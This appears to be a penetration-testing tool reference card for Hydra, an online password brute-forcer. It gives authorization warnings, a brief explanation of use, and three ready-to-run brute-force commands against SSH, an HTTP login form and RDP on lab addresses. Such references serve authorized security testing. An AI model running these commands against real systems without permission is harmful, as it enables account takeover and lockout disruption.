All tools

Password Attacks

Hydra

Online password brute-forcer for many network services.

beginner
Linux
Exploitation

Authorized testing only. Practice on systems you own, isolated labs, or targets with written permission. Unauthorized access is illegal.

Account lockouts can cause operational impact — respect RoE and rates.

When

Authorized credential testing against login services with lockout awareness.

How

Pick protocol module; supply user/pass lists; rate-limit; stop on success.

Why

Covers SSH, FTP, HTTP forms, RDP, etc. for lab auth testing.

Commands & usage

hydra -l admin -P rockyou.txt ssh://192.168.1.10
hydra -L users.txt -P passes.txt 192.168.1.10 http-post-form '/login:user=^USER^&pass=^PASS^:F=Invalid'
hydra -l admin -P passes.txt rdp://192.168.1.10

Commands are educational examples. Adapt hosts, paths, and rates to your authorized scope.

Tags

bruteforce
online
auth

Related in Password Attacks